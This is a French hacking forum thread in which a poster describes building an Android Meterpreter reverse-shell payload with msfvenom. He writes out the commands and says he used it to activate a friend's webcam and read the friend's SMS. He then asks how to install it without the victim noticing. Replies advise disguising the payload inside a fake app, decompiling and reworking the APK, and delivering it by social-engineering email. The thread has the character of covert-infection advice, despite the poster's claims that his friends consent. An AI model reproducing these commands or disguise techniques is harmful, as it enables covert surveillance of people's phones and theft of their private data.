Annonce

Réduire
Aucune annonce.

Cracker un téléphone androïd "proprement"

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Cracker un téléphone androïd "proprement"

    Bonsoir à tous,

    Ce soir, j'ai effectué mon premier hack (et j'en suis très fier ).

    J'ai créé un payload, que j'ai envoyé par mail à un ami, qui l'a téléchargé.

    Grâce à Metasploit, je me suis connecté à son téléphone et j'ai réussi à activer sa webcam, récupérer ses sms etc.

    Seulement, je me suis fait une remarque assez intéressante : on a pas tous un ami qui accepte gentiment de télécharger le virus haha.

    Du coup, pour pousser l'exercice et le rendre utilisable en condition réel, comment fait-on ?

    Doit-on modifier le code du payload pour le rendre exécutable en tant que Daemon ? Peut-on le masquer dans un autre téléchargement ?

    J'ai déjà effectué quelques recherches, mais je vous avoue que je m'y perd un peu.

    Merci d'avance,

    Jeriko

    PS : Je précise (même si je pense que c'est clair dans mon message) que j'ai l'autorisation d'exécuter mes hacks sur les appareils de mes amis.

  • #2
    Tu veux dire, c'était un ami ??? Le programme est en java ? Ce n'est pas daemon, pour android on appelle cela Service

    Commentaire


    • #3
      Non non, c'est un ami (encore actuellement haha). J'ai deux trois potes qui m'autorisent à tester sur leurs appareils. Ça me permet de m'entrainer dans un environment qui n'est pas le mien, je préfère. ^^

      J'ai utilisé cette commande : msfvevom -p android/meterpreter/reverse_tcp LHOST=MonIP LPORT=LePortChoisi R >Nom.apk

      Puis je passe sur la console de Metasploit avec : msfconsole

      Ensuite je lance le hack avec les commandes suivantes :

      use multi/handler
      set payload android/meterpreter/reverse_tcp
      set LHOST MonIP
      set LPORT LePortChoisi
      exploit

      Merci pour le vocabulaire, je ne savais pas qu'on appelait ça différemment sur Android.

      Edit :

      Evidemment, j'installe le hack sur le téléphone infecté avant de passer sur Metasploit.
      En passant par cette procédure, mon ami a du installer lui-même le hack sur son téléphone.
      Du coup ma question est la suivante : comment faire pour que je puisse l'installer sans qu'il s'en rende compte ? (du moins, dans l'idée)

      Malheureusement, mais connaissances sont encore trop limité pour savoir dans quel langage est codé le payload. Si tu veux, je peux te l'envoyer pour que tu l'analyses ?
      Dernière modification par Jeriko, 13 octobre 2016, 13h54.

      Commentaire


      • #4
        Pour avoir l'original tu devra décompiler le file APK Tu aura un fichier de type XML. Le but étant de travailler sur les uses-permissions. Il travaille sur les autorisations. Bref, renseigne toi sur google, tu comprendras une fois décompiler et étudié le code de ton payload.

        Commentaire


        • #5
          Je ne suis pas connaisseur du domaine, mais de ce que j'ai compris il faut forcément que ta cible (ici ton ami) installe ton hack d'une manière ou d'une autre. Donc soit tu caches ça dans une appli android quelconque (jeu, appli de prise de note ou n'importe quoi), soit tu envoies un lien Internet d'où il télécharge ce hack (déguisé en ce que tu veux).

          Commentaire


          • #6
            Décompiler l'apk, retravailler le code... C'est noté, merci DreAmuS !

            [email protected]§eeker Ce que tu me proposes serait une étapes de plus vers ce que je recherche.
            Dans l'idée, j'aimerai vraiment que l'utilisateur n'ait pas à interagir avec le fichier, qu'une fois qu'il sera sur son téléphone il s'exécute tout seul comme un grand.

            Je vais quand même regarder les différents moyens qui existent pour le déguiser ! Merci du conseil.

            Commentaire


            • #7
              Si tu veux envoyer un fichier infecté à quelqu'un d'autre que tes amis, pas besoin de te compliquer la vie.
              Tu camoufles le truc dans un email et la --> Social Enginnering
              Fouille un peu sur le forum, y'a pas mal de bon tuto qui traînent, et c'est plus simple (je trouve) que de camoufler le truc dans une fausse app...

              Bref, bon courage dans tes recherches, même si je trouve cela un peu "limite" pour tes amis...
              @bioshock
              Twitter: @ContactBioshock
              Mail: [email protected]

              Commentaire


              • #8
                Salut Bioshock,

                L'objectif final serait d'installer le service sur une micro SD qui, en plugant sur le téléphone, installera tout seul le payload (ou bien sur une clé USB pour un ordinateur etc).
                Le problème du mail c'est qu'on a encore besoin d'une interaction utilisateur. J'apprendrai bien entendu à le faire, mais ce n'est pas ce que je recherche au final.

                Juste pour être clair, toutes les manipulation que je fais sur le matériel de mes amis se fait avec leur présence à côté de moi, et je leur explique "simplement" tout ce que je fais. Je ne cherche pas à les hacker, mais à m'entrainer dans un environment qui n'est pas le mien. La preuve, le payload que j'avais préalablement préparer chez moi n'a pas fonctionner sur le téléphone de mon ami, à cause d'un problème d'IP que je n'avais pas prévu (et que je ne pouvais pas prévoir en restant chez moi). Il n'y a aucune intention de nuire dans la démarche.

                Merci pour ta réponse en tout cas ! Si tu as des pistes de recherche me permettant d'atteindre mon objectif final, je suis preneur. En attendant, je vais m'entraîner au social enginnering !

                Encore merci, et bonne soirée !

                Jeriko

                Commentaire


                • #9
                  Jeriko Ok je comprends ou tu voulais en venir, je proposais seulement une alternative. Et me voilà rassuré pour te amis

                  Bonne chance, tiens nous au courant,

                  Bioshock
                  @bioshock
                  Twitter: @ContactBioshock
                  Mail: [email protected]

                  Commentaire

                  Chargement...
                  X